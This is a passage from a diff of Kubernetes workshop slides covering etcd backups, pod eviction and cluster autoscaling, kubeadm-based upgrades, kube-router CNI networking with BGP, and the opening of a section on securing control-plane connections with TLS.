+        --ignore-preflight-errors=DirAvailable--var-lib-etcd
+   ```
+
+3. Rejoin the other nodes
+
+---
+
+## The fine print
+
+- This only saves etcd state
+
+- It **does not** save persistent volumes and local node data
+
+- Some critical components (like the pod network) might need to be reset
+
+- As a result, our pods might have to be recreated, too
+
+- If we have proper liveness checks, this should happen automatically
+
+---
+
+## More information about etcd backups
+
+- [Kubernetes documentation](https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#built-in-snapshot) about etcd backups
+
+- [etcd documentation](https://coreos.com/etcd/docs/latest/op-guide/recovery.html#snapshotting-the-keyspace) about snapshots and restore
+
+- [A good blog post by elastisys](https://elastisys.com/2018/12/10/backup-kubernetes-how-and-why/) explaining how to restore a snapshot
+
+- [Another good blog post by consol labs](https://labs.consol.de/kubernetes/2018/05/25/kubeadm-backup.html) on the same topic
+
+---
+
+## Don't forget ...
+
+- Also back up the TLS information
+
+  (at the very least: CA key and cert; API server key and cert)
+
+- With clusters provisioned by kubeadm, this is in `/etc/kubernetes/pki`
+
+- If you don't:
+
+  - you will still be able to restore etcd state and bring everything back up
+
+  - you will need to redistribute user certificates
+
+.warning[**TLS information is highly sensitive! 
+<br/>Anyone who has it has full access to your cluster!**]
+
+---
+
+## Stateful services
+
+- It's totally fine to keep your production databases outside of Kubernetes
+
+  *Especially if you have only one database server!*
+
+- Feel free to put development and staging databases on Kubernetes
+
+  (as long as they don't hold important data)
+
+- Using Kubernetes for stateful services makes sense if you have *many*
+
+  (because then you can leverage Kubernetes automation)
+
+---
+
+## Snapshotting persistent volumes
+
+- Option 1: snapshot volumes out of band
+
+  (with the API/CLI/GUI of our SAN/cloud/...)
+
+- Option 2: storage system integration
+
+  (e.g. [Portworx](https://docs.portworx.com/portworx-install-with-kubernetes/storage-operations/create-snapshots/) can [create snapshots through annotations](https://docs.portworx.com/portworx-install-with-kubernetes/storage-operations/create-snapshots/snaps-annotations/#taking-periodic-snapshots-on-a-running-pod))
+
+- Option 3: [snapshots through Kubernetes API](https://kubernetes.io/blog/2018/10/09/introducing-volume-snapshot-alpha-for-kubernetes/)
+
+  (now in alpha for a few storage providers: GCE, OpenSDS, Ceph, Portworx)
+
+---
+
+## More backup tools
+
+- [Stash](https://appscode.com/products/stash/)
+
+  back up Kubernetes persistent volumes
+
+- [ReShifter](https://github.com/mhausenblas/reshifter)
+
+  cluster state management
+
+- ~~Heptio Ark~~ [Velero](https://github.com/heptio/velero)
+
+  full cluster backup
+
+- [kube-backup](https://github.com/pieterlange/kube-backup)
+
+  simple scripts to save resource YAML to a git repository
--- a/slides/k8s/cluster-sizing.md
+++ b/slides/k8s/cluster-sizing.md
@@ -0,0 +1,167 @@
+# Cluster sizing
+
+- What happens when the cluster gets full?
+
+- How can we scale up the cluster?
+
+- Can we do it automatically?
+
+- What are other methods to address capacity planning?
+
+---
+
+## When are we out of resources?
+
+- kubelet monitors node resources:
+
+  - memory
+
+  - node disk usage (typically the root filesystem of the node)
+
+  - image disk usage (where container images and RW layers are stored)
+
+- For each resource, we can provide two thresholds:
+
+  - a hard threshold (if it's met, it provokes immediate action)
+
+  - a soft threshold (provokes action only after a grace period)
+
+- Resource thresholds and grace periods are configurable
+
+  (by passing kubelet command-line flags)
+
+---
+
+## What happens then?
+
+- If disk usage is too high:
+
+  - kubelet will try to remove terminated pods
+
+  - then, it will try to *evict* pods
+
+- If memory usage is too high:
+
+  - it will try to evict pods
+
+- The node is marked as "under pressure"
+
+- This temporarily prevents new pods from being scheduled on the node
+
+---
+
+## Which pods get evicted?
+
+- kubelet looks at the pods' QoS and PriorityClass
+
+- First, pods with BestEffort QoS are considered
+
+- Then, pods with Burstable QoS exceeding their *requests*
+
+  (but only if the exceeding resource is the one that is low on the node)
+
+- Finally, pods with Guaranteed QoS, and Burstable pods within their requests
+
+- Within each group, pods are sorted by PriorityClass
+
+- If there are pods with the same PriorityClass, they are sorted by usage excess
+
+  (i.e. the pods whose usage exceeds their requests the most are evicted first)
+
+---
+
+class: extra-details
+
+## Eviction of Guaranteed pods
+
+- *Normally*, pods with Guaranteed QoS should not be evicted
+
+- A chunk of resources is reserved for node processes (like kubelet)
+
+- It is expected that these processes won't use more than this reservation
+
+- If they do use more resources anyway, all bets are off!
+
+- If this happens, kubelet must evict Guaranteed pods to preserve node stability
+
+  (or Burstable pods that are still within their requested usage)
+
+---
+
+## What happens to evicted pods?
+
+- The pod is terminated
+
+- It is marked as `Failed` at the API level
+
+- If the pod was created by a controller, the controller will recreate it
+
+- The pod will be recreated on another node, *if there are resources available!*
+
+- For more details about the eviction process, see:
+
+  - [this documentation page](https://kubernetes.io/docs/tasks/administer-cluster/out-of-resource/) about resource pressure and pod eviction,
+
+  - [this other documentation page](https://kubernetes.io/docs/concepts/configuration/pod-priority-preemption/) about pod priority and preemption.
+
+---
+
+## What if there are no resources available?
+
+- Sometimes, a pod cannot be scheduled anywhere:
+
+  - all the nodes are under pressure,
+
+  - or the pod requests more resources than are available
+
+- The pod then remains in `Pending` state until the situation improves
+
+---
+
+## Cluster scaling
+
+- One way to improve the situation is to add new nodes
+
+- This can be done automatically with the [Cluster Autoscaler](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler)
+
+- The autoscaler will automatically scale up:
+
+  - if there are pods that failed to be scheduled
+
+- The autoscaler will automatically scale down:
+
+  - if nodes have a low utilization for an extended period of time
+
+---
+
+## Restrictions, gotchas ...
+
+- The Cluster Autoscaler only supports a few cloud infrastructures
+
+  (see [here](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler/cloudprovider) for a list)
+
+- The Cluster Autoscaler cannot scale down nodes that have pods using:
+
+  - local storage
+
+  - affinity/anti-affinity rules preventing them from being rescheduled
+
+  - a restrictive PodDisruptionBudget
+
+---
+
+## Other way to do capacity planning
+
+- "Running Kubernetes without nodes"
+
+- Systems like [Virtual Kubelet](https://virtual-kubelet.io/) or Kiyot can run pods using on-demand resources
+
+  - Virtual Kubelet can leverage e.g. ACI or Fargate to run pods
+
+  - Kiyot runs pods in ad-hoc EC2 instances (1 instance per pod)
+
+- Economic advantage (no wasted capacity)
+
+- Security advantage (stronger isolation between pods)
+
+Check [this blog post](http://jpetazzo.github.io/2019/02/13/running-kubernetes-without-nodes-with-kiyot/) for more details.
--- a/slides/k8s/cluster-upgrade.md
+++ b/slides/k8s/cluster-upgrade.md
@@ -0,0 +1,309 @@
+# Upgrading clusters
+
+- It's *recommended* to run consistent versions across a cluster
+
+  (mostly to have feature parity and latest security updates)
+
+- It's not *mandatory*
+
+  (otherwise, cluster upgrades would be a nightmare!)
+
+- Components can be upgraded one at a time without problems
+
+---
+
+## Checking what we're running
+
+- It's easy to check the version for the API server
+
+.exercise[
+
+- Log into node `test1`
+
+- Check the version of kubectl and of the API server:
+  ```bash
+  kubectl version
+  ```
+
+]
+
+- In a HA setup with multiple API servers, they can have different versions
+
+- Running the command above multiple times can return different values
+
+---
+
+## Node versions
+
+- It's also easy to check the version of kubelet
+
+.exercise[
+
+- Check node versions (includes kubelet, kernel, container engine):
+  ```bash
+  kubectl get nodes -o wide
+  ```
+
+]
+
+- Different nodes can run different kubelet versions
+
+- Different nodes can run different kernel versions
+
+- Different nodes can run different container engines
+
+---
+
+## Control plane versions
+
+- If the control plane is self-hosted (running in pods), we can check it
+
+.exercise[
+
+- Show image versions for all pods in `kube-system` namespace:
+  ```bash
+    kubectl --namespace=kube-system get pods -o json \
+            | jq -r '
+              .items[]
+              | [.spec.nodeName, .metadata.name]
+                + 
+                (.spec.containers[].image | split(":"))
+              | @tsv
+              ' \
+            | column -t
+  ```
+
+]
+
+---
+
+## What version are we running anyway?
+
+- When I say, "I'm running Kubernetes 1.11", is that the version of:
+
+  - kubectl
+
+  - API server
+
+  - kubelet
+
+  - controller manager
+
+  - something else?
+
+---
+
+## Other versions that are important
+
+- etcd
+
+- kube-dns or CoreDNS
+
+- CNI plugin(s)
+
+- Network controller, network policy controller
+
+- Container engine
+
+- Linux kernel
+
+---
+
+## General guidelines
+
+- To update a component, use whatever was used to install it
+
+- If it's a distro package, update that distro package
+
+- If it's a container or pod, update that container or pod
+
+- If you used configuration management, update with that
+
+---
+
+## Know where your binaries come from
+
+- Sometimes, we need to upgrade *quickly*
+
+  (when a vulnerability is announced and patched)
+
+- If we are using an installer, we should:
+
+  - make sure it's using upstream packages
+
+  - or make sure that whatever packages it uses are current
+
+  - make sure we can tell it to pin specific component versions
+
+---
+
+## In practice
+
+- We are going to update a few cluster components
+
+- We will change the kubelet version on one node
+
+- We will change the version of the API server
+
+- We will work with cluster `test` (nodes `test1`, `test2`, `test3`)
+
+---
+
+## Updating kubelet
+
+- These nodes have been installed using the official Kubernetes packages
+
+- We can therefore use `apt` or `apt-get`
+
+.exercise[
+
+- Log into node `test3`
+
+- View available versions for package `kubelet`:
+  ```bash
+  apt show kubelet -a | grep ^Version
+  ```
+
+- Upgrade kubelet:
+  ```bash
+  apt install kubelet=1.14.2-00
+  ```
+
+]
+
+---
+
+## Checking what we've done
+
+.exercise[
+
+- Log into node `test1`
+
+- Check node versions:
+  ```bash
+  kubectl get nodes -o wide
+  ```
+
+- Create a deployment and scale it to make sure that the node still works
+
+]
+
+---
+
+## Updating the API server
+
+- This cluster has been deployed with kubeadm
+
+- The control plane runs in *static pods*
+
+- These pods are started automatically by kubelet
+
+  (even when kubelet can't contact the API server)
+
+- They are defined in YAML files in `/etc/kubernetes/manifests`
+
+  (this path is set by a kubelet command-line flag)
+
+- kubelet automatically updates the pods when the files are changed
+
+---
+
+## Changing the API server version
+
+- We will edit the YAML file to use a different image version
+
+.exercise[
+
+- Log into node `test1`
+
+- Check API server version:
+  ```bash
+  kubectl version
+  ```
+
+- Edit the API server pod manifest:
+  ```bash
+  sudo vim /etc/kubernetes/manifests/kube-apiserver.yaml
+  ```
+
+- Look for the `image:` line, and update it to e.g. `v1.14.0`
+
+]
+
+---
+
+## Checking what we've done
+
+- The API server will be briefly unavailable while kubelet restarts it
+
+.exercise[
+
+- Check the API server version:
+  ```bash
+  kubectl version
+  ```
+
+]
+
+---
+
+## Updating the whole control plane
+
+- As an example, we'll use kubeadm to upgrade the entire control plane
+
+  (note: this is possible only because the cluster was installed with kubeadm)
+
+.exercise[
+
+- Check what will be upgraded:
+  ```bash
+  sudo kubeadm upgrade plan
+  ```
+
+  (Note: kubeadm is confused by our manual upgrade of the API server.
+  <br/>It thinks the cluster is running 1.14.0!)
+
+<!-- ##VERSION## -->
+
+- Perform the upgrade:
+  ```bash
+  sudo kubeadm upgrade apply v1.14.2
+  ```
+
+]
+
+---
+
+## Updating kubelets
+
+- After updating the control plane, we need to update each kubelet
+
+- This requires to run a special command on each node, to download the config
+
+  (this config is generated by kubeadm)
+
+.exercise[
+
+- Download the configuration on each node, and upgrade kubelet:
+  ```bash
+    for N in 1 2 3; do
+      ssh test$N sudo kubeadm upgrade node config --kubelet-version v1.14.2
+      ssh test$N sudo apt install kubelet=1.14.2-00
+    done
+  ```
+]
+
+---
+
+## Checking what we've done
+
+- All our nodes should now be updated to version 1.14.2
+
+.exercise[
+
+- Check nodes versions:
+  ```bash
+  kubectl get nodes -o wide
+  ```
+
+]
--- a/slides/k8s/cni.md
+++ b/slides/k8s/cni.md
@@ -0,0 +1,688 @@
+# The Container Network Interface
+
+- Allows us to decouple network configuration from Kubernetes
+
+- Implemented by *plugins*
+
+- Plugins are executables that will be invoked by kubelet
+
+- Plugins are responsible for:
+
+  - allocating IP addresses for containers
+
+  - configuring the network for containers
+
+- Plugins can be combined and chained when it makes sense
+
+---
+
+## Combining plugins
+
+- Interface could be created by e.g. `vlan` or `bridge` plugin
+
+- IP address could be allocated by e.g. `dhcp` or `host-local` plugin
+
+- Interface parameters (MTU, sysctls) could be tweaked by the `tuning` plugin
+
+The reference plugins are available [here].
+
+Look in each plugin's directory for its documentation.
+
+[here]: https://github.com/containernetworking/plugins/tree/master/plugins
+
+---
+
+## How does kubelet know which plugins to use?
+
+- The plugin (or list of plugins) is set in the CNI configuration
+
+- The CNI configuration is a *single file* in `/etc/cni/net.d`
+
+- If there are multiple files in that directory, the first one is used
+
+  (in lexicographic order)
+
+- That path can be changed with the `--cni-conf-dir` flag of kubelet
+
+---
+
+## CNI configuration in practice
+
+- When we set up the "pod network" (like Calico, Weave...) it ships a CNI configuration
+
+  (and sometimes, custom CNI plugins)
+
+- Very often, that configuration (and plugins) is installed automatically
+
+  (by a DaemonSet featuring an initContainer with hostPath volumes)
+
+- Examples:
+
+  - Calico [CNI config](https://github.com/projectcalico/calico/blob/1372b56e3bfebe2b9c9cbf8105d6a14764f44159/v2.6/getting-started/kubernetes/installation/hosted/calico.yaml#L25)
+    and [volume](https://github.com/projectcalico/calico/blob/1372b56e3bfebe2b9c9cbf8105d6a14764f44159/v2.6/getting-started/kubernetes/installation/hosted/calico.yaml#L219)
+
+  - kube-router [CNI config](https://github.com/cloudnativelabs/kube-router/blob/c2f893f64fd60cf6d2b6d3fee7191266c0fc0fe5/daemonset/generic-kuberouter.yaml#L10)
+    and [volume](https://github.com/cloudnativelabs/kube-router/blob/c2f893f64fd60cf6d2b6d3fee7191266c0fc0fe5/daemonset/generic-kuberouter.yaml#L73)
+
+---
+
+class: extra-details
+
+## Conf vs conflist
+
+- There are two slightly different configuration formats
+
+- Basic configuration format:
+
+  - holds configuration for a single plugin
+  - typically has a `.conf` name suffix
+  - has a `type` string field in the top-most structure
+  - [examples](https://github.com/containernetworking/cni/blob/master/SPEC.md#example-configurations)
+
+- Configuration list format:
+
+  - can hold configuration for multiple (chained) plugins
+  - typically has a `.conflist` name suffix
+  - has a `plugins` list field in the top-most structure
+  - [examples](https://github.com/containernetworking/cni/blob/master/SPEC.md#network-configuration-lists)
+
+---
+
+class: extra-details
+
+## How plugins are invoked
+
+- Parameters are given through environment variables, including:
+
+  - CNI_COMMAND: desired operation (ADD, DEL, CHECK, or VERSION)
+
+  - CNI_CONTAINERID: container ID
+
+  - CNI_NETNS: path to network namespace file
+
+  - CNI_IFNAME: what the network interface should be named
+
+- The network configuration must be provided to the plugin on stdin
+
+  (this avoids race conditions that could happen by passing a file path)
+
+---
+
+## In practice: kube-router
+
+- We are going to set up a new cluster
+
+- For this new cluster, we will use kube-router
+
+- kube-router will provide the "pod network"
+
+  (connectivity with pods)
+
+- kube-router will also provide internal service connectivity
+
+  (replacing kube-proxy)
+
+---
+
+## How kube-router works
+
+- Very simple architecture
+
+- Does not introduce new CNI plugins
+
+  (uses the `bridge` plugin, with `host-local` for IPAM)
+
+- Pod traffic is routed between nodes
+
+  (no tunnel, no new protocol)
+
+- Internal service connectivity is implemented with IPVS
+
+- Can provide pod network and/or internal service connectivity
+
+- kube-router daemon runs on every node
+
+---
+
+## What kube-router does
+
+- Connect to the API server
+
+- Obtain the local node's `podCIDR`
+
+- Inject it into the CNI configuration file
+
+  (we'll use `/etc/cni/net.d/10-kuberouter.conflist`)
+
+- Obtain the addresses of all nodes
+
+- Establish a *full mesh* BGP peering with the other nodes
+
+- Exchange routes over BGP
+
+---
+
+## What's BGP?
+
+- BGP (Border Gateway Protocol) is the protocol used between internet routers
+
+- It [scales](https://www.cidr-report.org/as2.0/)
+  pretty [well](https://www.cidr-report.org/cgi-bin/plota?file=%2fvar%2fdata%2fbgp%2fas2.0%2fbgp-active%2etxt&descr=Active%20BGP%20entries%20%28FIB%29&ylabel=Active%20BGP%20entries%20%28FIB%29&with=step)
+  (it is used to announce the 700k CIDR prefixes of the internet)
+
+- It is spoken by many hardware routers from many vendors
+
+- It also has many software implementations (Quagga, Bird, FRR...)
+
+- Experienced network folks generally know it (and appreciate it)
+
+- It also used by Calico (another popular network system for Kubernetes)
+
+- Using BGP allows us to interconnect our "pod network" with other systems
+
+---
+
+## The plan
+
+- We'll work in a new cluster (named `kuberouter`)
+
+- We will run a simple control plane (like before)
+
+- ... But this time, the controller manager will allocate `podCIDR` subnets
+
+  (so that we don't have to manually assign subnets to individual nodes)
+
+- We will create a DaemonSet for kube-router
+
+- We will join nodes to the cluster
+
+- The DaemonSet will automatically start a kube-router pod on each node
+
+---
+
+## Logging into the new cluster
+
+.exercise[
+
+- Log into node `kuberouter1`
+
+- Clone the workshop repository:
+  ```bash
+  git clone https://@@GITREPO@@
+  ```
+
+- Move to this directory:
+  ```bash
+  cd container.training/compose/kube-router-k8s-control-plane
+  ```
+
+]
+
+---
+
+## Our control plane
+
+- We will use a Compose file to start the control plane
+
+- It is similar to the one we used with the `kubenet` cluster
+
+- The API server is started with `--allow-privileged`
+
+  (because we will start kube-router in privileged pods)
+
+- The controller manager is started with extra flags too:
+
+  `--allocate-node-cidrs` and `--cluster-cidr`
+
+- We need to edit the Compose file to set the Cluster CIDR
+
+---
+
+## Starting the control plane
+
+- Our cluster CIDR will be `10.C.0.0/16`
+
+  (where `C` is our cluster number)
+
+.exercise[
+
+- Edit the Compose file to set the Cluster CIDR:
+  ```bash
+  vim docker-compose.yaml
+  ```
+
+- Start the control plane:
+  ```bash
+  docker-compose up
+  ```
+
+]
+
+---
+
+## The kube-router DaemonSet
+
+- In the same directory, there is a `kuberouter.yaml` file
+
+- It contains the definition for a DaemonSet and a ConfigMap
+
+- Before we load it, we also need to edit it
+
+- We need to indicate the address of the API server
+
+  (because kube-router needs to connect to it to retrieve node information)
+
+---
+
+## Creating the DaemonSet
+
+- The address of the API server will be `http://A.B.C.D:8080`
+
+  (where `A.B.C.D` is the public address of `kuberouter1`, running the control plane)
+
+.exercise[
+
+- Edit the YAML file to set the API server address:
+  ```bash
+  vim kuberouter.yaml
+  ```
+
+- Create the DaemonSet:
+  ```bash
+  kubectl create -f kuberouter.yaml
+  ```
+
+]
+
+Note: the DaemonSet won't create any pods (yet) since there are no nodes (yet).
+
+---
+
+## Generating the kubeconfig for kubelet
+
+- This is similar to what we did for the `kubenet` cluster
+
+.exercise[
+
+- Generate the kubeconfig file (replacing `X.X.X.X` with the address of `kuberouter1`):
+  ```bash
+    kubectl config set-cluster cni --server http://`X.X.X.X`:8080
+    kubectl config set-context cni --cluster cni
+    kubectl config use-context cni
+    cp ~/.kube/config ~/kubeconfig
+  ```
+
+]
+
+---
+
+## Distributing kubeconfig
+
+- We need to copy that kubeconfig file to the other nodes
+
+.exercise[
+
+- Copy `kubeconfig` to the other nodes:
+  ```bash
+    for N in 2 3; do
+    	scp ~/kubeconfig kuberouter$N:
+    done
+  ```
+
+]
+
+---
+
+## Starting kubelet
+
+- We don't need the `--pod-cidr` option anymore
+
+  (the controller manager will allocate these automatically)
+
+- We need to pass `--network-plugin=cni`
+
+.exercise[
+
+- Join the first node:
+   ```bash
+   sudo kubelet --kubeconfig ~/kubeconfig --network-plugin=cni
+   ```
+
+- Open more terminals and join the other nodes:
+  ```bash
+  ssh kuberouter2 sudo kubelet --kubeconfig ~/kubeconfig --network-plugin=cni
+  ssh kuberouter3 sudo kubelet --kubeconfig ~/kubeconfig --network-plugin=cni
+  ```
+
+]
+
+---
+
+## Setting up a test
+
+- Let's create a Deployment and expose it with a Service
+
+.exercise[
+
+- Create a Deployment running a web server:
+  ```bash
+  kubectl create deployment web --image=jpetazzo/httpenv
+  ```
+
+- Scale it so that it spans multiple nodes:
+  ```bash
+  kubectl scale deployment web --replicas=5
+  ```
+
+- Expose it with a Service:
+  ```bash
+  kubectl expose deployment web --port=8888
+  ```
+
+]
+
+---
+
+## Checking that everything works
+
+.exercise[
+
+- Get the ClusterIP address for the service:
+  ```bash
+  kubectl get svc web
+  ```
+
+- Send a few requests there:
+  ```bash
+  curl `X.X.X.X`:8888
+  ```
+
+]
+
+Note that if you send multiple requests, they are load-balanced in a round robin manner.
+
+This shows that we are using IPVS (vs. iptables, which picked random endpoints).
+
+---
+
+## Troubleshooting
+
+- What if we need to check that everything is working properly?
+
+.exercise[
+
+- Check the IP addresses of our pods:
+  ```bash
+  kubectl get pods -o wide
+  ```
+
+- Check our routing table:
+  ```bash
+  route -n
+  ip route
+  ```
+
+]
+
+We should see the local pod CIDR connected to `kube-bridge`, and the other nodes' pod CIDRs having individual routes, with each node being the gateway.
+
+---
+
+## More troubleshooting
+
+- We can also look at the output of the kube-router pods
+
+  (with `kubectl logs`)
+
+- kube-router also comes with a special shell that gives lots of useful info
+
+  (we can access it with `kubectl exec`)
+
+- But with the current setup of the cluster, these options may not work!
+
+- Why?
+
+---
+
+## Trying `kubectl logs` / `kubectl exec`
+
+.exercise[
+
+- Try to show the logs of a kube-router pod:
+  ```bash
+  kubectl -n kube-system logs ds/kube-router
+  ```
+
+- Or try to exec into one of the kube-router pods:
+  ```bash
+  kubectl -n kube-system exec kube-router-xxxxx bash
+  ```
+
+]
+
+These commands will give an error message that includes:
+```
+dial tcp: lookup kuberouterX on 127.0.0.11:53: no such host
+```
+
+What does that mean?
+
+---
+
+## Internal name resolution
+
+- To execute these commands, the API server needs to connect to kubelet
+
+- By default, it creates a connection using the kubelet's name
+
+  (e.g. `http://kuberouter1:...`)
+
+- This requires our nodes names to be in DNS
+
+- We can change that by setting a flag on the API server:
+
+  `--kubelet-preferred-address-types=InternalIP`
+
+---
+
+## Another way to check the logs
+
+- We can also ask the logs directly to the container engine
+
+- First, get the container ID, with `docker ps` or like this:
+  ```bash
+  CID=$(docker ps -q \
+        --filter label=io.kubernetes.pod.namespace=kube-system \
+        --filter label=io.kubernetes.container.name=kube-router)
+  ```
+
+- Then view the logs:
+  ```bash
+  docker logs $CID
+  ```
+
+---
+
+class: extra-details
+
+## Other ways to distribute routing tables
+
+- We don't need kube-router and BGP to distribute routes
+
+- The list of nodes (and associated `podCIDR` subnets) is available through the API
+
+- This shell snippet generates the commands to add all required routes on a node:
+
+```bash
+NODES=$(kubectl get nodes -o name | cut -d/ -f2)
+for DESTNODE in $NODES; do
+  if [ "$DESTNODE" != "$HOSTNAME" ]; then
+    echo $(kubectl get node $DESTNODE -o go-template="
+      route add -net {{.spec.podCIDR}} gw {{(index .status.addresses 0).address}}")
+  fi
+done
+```
+
+- This could be useful for embedded platforms with very limited resources
+
+  (or lab environments for learning purposes)
+
+---
+
+# Interconnecting clusters
+
+- We assigned different Cluster CIDRs to each cluster
+
+- This allows us to connect our clusters together
+
+- We will leverage kube-router BGP abilities for that
+
+- We will *peer* each kube-router instance with a *route reflector*
+
+- As a result, we will be able to ping each other's pods
+
+---
+
+## Disclaimers
+
+- There are many methods to interconnect clusters
+
+- Depending on your network implementation, you will use different methods
+
+- The method shown here only works for nodes with direct layer 2 connection
+
+- We will often need to use tunnels or other network techniques
+
+---
+
+## The plan
+
+- Someone will start the *route reflector*
+
+  (typically, that will be the person presenting these slides!)
+
+- We will update our kube-router configuration
+
+- We will add a *peering* with the route reflector
+
+  (instructing kube-router to connect to it and exchange route information)
+
+- We should see the routes to other clusters on our nodes
+
+  (in the output of e.g. `route -n` or `ip route show`)
+
+- We should be able to ping pods of other nodes
+
+---
+
+## Starting the route reflector
+
+- Only do this slide if you are doing this on your own
+
+- There is a Compose file in the `compose/frr-route-reflector` directory
+
+- Before continuing, make sure that you have the IP address of the route reflector
+
+---
+
+## Configuring kube-router
+
+- This can be done in two ways:
+
+  - with command-line flags to the `kube-router` process
+
+  - with annotations to Node objects
+
+- We will use the command-line flags
+
+  (because it will automatically propagate to all nodes)
+
+.footnote[Note: with Calico, this is achieved by creating a BGPPeer CRD.]
+
+---
+
+## Updating kube-router configuration
+
+- We need to pass two command-line flags to the kube-router process
+
+.exercise[
+
+- Edit the `kuberouter.yaml` file
+
+- Add the following flags to the kube-router arguments:
+  ```
+  - "--peer-router-ips=`X.X.X.X`"
+  - "--peer-router-asns=64512"
+  ```
+  (Replace `X.X.X.X` with the route reflector address)
+
+- Update the DaemonSet definition:
+  ```bash
+  kubectl apply -f kuberouter.yaml
+  ```
+
+]
+
+---
+
+## Restarting kube-router
+
+- The DaemonSet will not update the pods automatically
+
+  (it is using the default `updateStrategy`, which is `OnDelete`)
+
+- We will therefore delete the pods
+
+  (they will be recreated with the updated definition)
+
+.exercise[
+
+- Delete all the kube-router pods:
+  ```bash
+  kubectl delete pods -n kube-system -l k8s-app=kube-router
+  ```
+
+]
+
+Note: the other `updateStrategy` for a DaemonSet is RollingUpdate.
+<br/>
+For critical services, we might want to precisely control the update process.
+
+---
+
+## Checking peering status
+
+- We can see informative messages in the output of kube-router:
+  ```
+  time="2019-04-07T15:53:56Z" level=info msg="Peer Up"
+  Key=X.X.X.X State=BGP_FSM_OPENCONFIRM Topic=Peer
+  ```
+
+- We should see the routes of the other clusters show up
+
+- For debugging purposes, the reflector also exports a route to 1.0.0.2/32
+
+- That route will show up like this:
+  ```
+  1.0.0.2     172.31.X.Y    255.255.255.255 UGH   0      0        0 eth0
+  ```
+
+- We should be able to ping the pods of other clusters!
+
+---
+
+## If we wanted to do more ...
+
+- kube-router can also export ClusterIP addresses
+
+  (by adding the flag `--advertise-cluster-ip`)
+
+- They are exported individually (as /32)
+
+- This would allow us to easily access other clusters' services
+
+  (without having to resolve the individual addresses of pods)
+
+- Even better if it's combined with DNS integration
+
+  (to facilitate name → ClusterIP resolution)
--- a/slides/k8s/concepts-k8s.md
+++ b/slides/k8s/concepts-k8s.md
@@ -130,6 +130,14 @@ class: pic

 ---

+class: pic
+
+![One of the best Kubernetes architecture diagrams available](images/k8s-arch4-thanks-luxas.png)
+
+---
+
+class: extra-details
+
 ## Running the control plane on special nodes

 - It is common to reserve a dedicated node for the control plane
@@ -152,6 +160,8 @@ class: pic

 ---

+class: extra-details
+
 ## Running the control plane outside containers

 - The services of the control plane can run in or out of containers
@@ -167,10 +177,12 @@ class: pic

 - In that case, there is no "master node"

-*For this reason, it is more accurate to say "control plane" rather than "master".*
+*For this reason, it is more accurate to say "control plane" rather than "master."*

 ---

+class: extra-details
+
 ## Do we need to run Docker at all?

 No!
@@ -187,6 +199,8 @@ No!

 ---

+class: extra-details
+
 ## Do we need to run Docker at all?

 Yes!
@@ -209,6 +223,8 @@ Yes!

 ---

+class: extra-details
+
 ## Do we need to run Docker at all?

 - On our development environments, CI pipelines ... :
@@ -225,25 +241,21 @@ Yes!

 ---

-## Kubernetes resources
+## Interacting with Kubernetes

- The Kubernetes API defines a lot of objects called *resources*
+- We will interact with our Kubernetes cluster through the Kubernetes API

- These resources are organized by type, or `Kind` (in the API)
+- The Kubernetes API is (mostly) RESTful
+
+- It allows us to create, read, update, delete *resources*

 - A few common resource types are:

  - node (a machine — physical or virtual — in our cluster)
+
  - pod (group of containers running together on a node)
+
  - service (stable network endpoint to connect to one or multiple containers)
-  - namespace (more-or-less isolated group of things)
-  - secret (bundle of sensitive data to be passed to a container)
- 
-  And much more!
-
- We can see the full list by running `kubectl api-resources`
-
-  (In Kubernetes 1.10 and prior, the command to list API resources was `kubectl get`)

 ---

@@ -253,22 +265,16 @@ class: pic

 ---

-class: pic
-
-![One of the best Kubernetes architecture diagrams available](images/k8s-arch4-thanks-luxas.png)
-
---
-
 ## Credits

- The first diagram is courtesy of Weave Works
+- The first diagram is courtesy of Lucas Käldström, in [this presentation](https://speakerdeck.com/luxas/kubeadm-cluster-creation-internals-from-self-hosting-to-upgradability-and-ha)
+
+  - it's one of the best Kubernetes architecture diagrams available!
+
+- The second diagram is courtesy of Weave Works

  - a *pod* can have multiple containers working together

  - IP addresses are associated with *pods*, not with individual containers

- The second diagram is courtesy of Lucas Käldström, in [this presentation](https://speakerdeck.com/luxas/kubeadm-cluster-creation-internals-from-self-hosting-to-upgradability-and-ha)
-
-  - it's one of the best Kubernetes architecture diagrams available!
-
 Both diagrams used with permission.
--- a/slides/k8s/configuration.md
+++ b/slides/k8s/configuration.md
@@ -22,7 +22,7 @@

 - There are many ways to pass configuration to code running in a container:

-  - baking it in a custom image
+  - baking it into a custom image

  - command-line arguments

@@ -125,7 +125,7 @@

 - We can also use a mechanism called the *downward API*

- The downward API allows to expose pod or container information
+- The downward API allows exposing pod or container information

  - either through special files (we won't show that for now)

@@ -436,7 +436,7 @@ We should see connections served by Google, and others served by IBM.

 - We are going to store the port number in a configmap

- Then we will expose that configmap to a container environment variable
+- Then we will expose that configmap as a container environment variable

 ---

--- a/slides/k8s/control-plane-auth.md
+++ b/slides/k8s/control-plane-auth.md
@@ -0,0 +1,265 @@
+# Securing the control plane
+
+- Many components accept connections (and requests) from others:
+
+  - API server
+
+  - etcd
+
+  - kubelet
+
+- We must secure these connections:
+
+  - to deny unauthorized requests
+
+  - to prevent eavesdropping secrets, tokens, and other sensitive information
+
+- Disabling authentication and/or authorization is **strongly discouraged**
+
+  (but it's possible to do it, e.g. for learning / troubleshooting purposes)
+
+---
+
+## Authentication and authorization
+
+- Authentication (checking "who you are") is done with mutual TLS
+
+ (both the client and the server need to hold a valid certificate)
+
+- Authorization (checking "what you can do") is done in different ways
+
+  - the API server implements a sophisticated permission logic (with RBAC)
+  
+  - some services will defer authorization to the API server (through webhooks)
+
+  - some services require a certificate signed by a particular CA / sub-CA
+
+---
+
+## In practice
+
+- We will review the various communication channels in the control plane
+
+- We will describe how they are secured
+
+- When TLS certificates are used, we will indicate:
+
+  - which CA signs them
+
+  - what their subject (CN) should be, when applicable
+
+- We will indicate how to configure security (client- and server-side)
+
+---
+
+## etcd peers
+
+- Replication and coordination of etcd happens on a dedicated port
+
+  (typically port 2380; the default port for normal client connections is 2379)
+
+- Authentication uses TLS certificates with a separate sub-CA
+
+  (otherwise, anyone with a Kubernetes client certificate could access etcd!)
+
+- The etcd command line flags involved are:
+
+   `--peer-client-cert-auth=true` to activate it
+
+   `--peer-cert-file`, `--peer-key-file`, `--peer-trusted-ca-file`
+
+---
+
+## etcd clients
+
+- The only¹ thing that connects to etcd is the API server
+
+- Authentication uses TLS certificates with a separate sub-CA
+
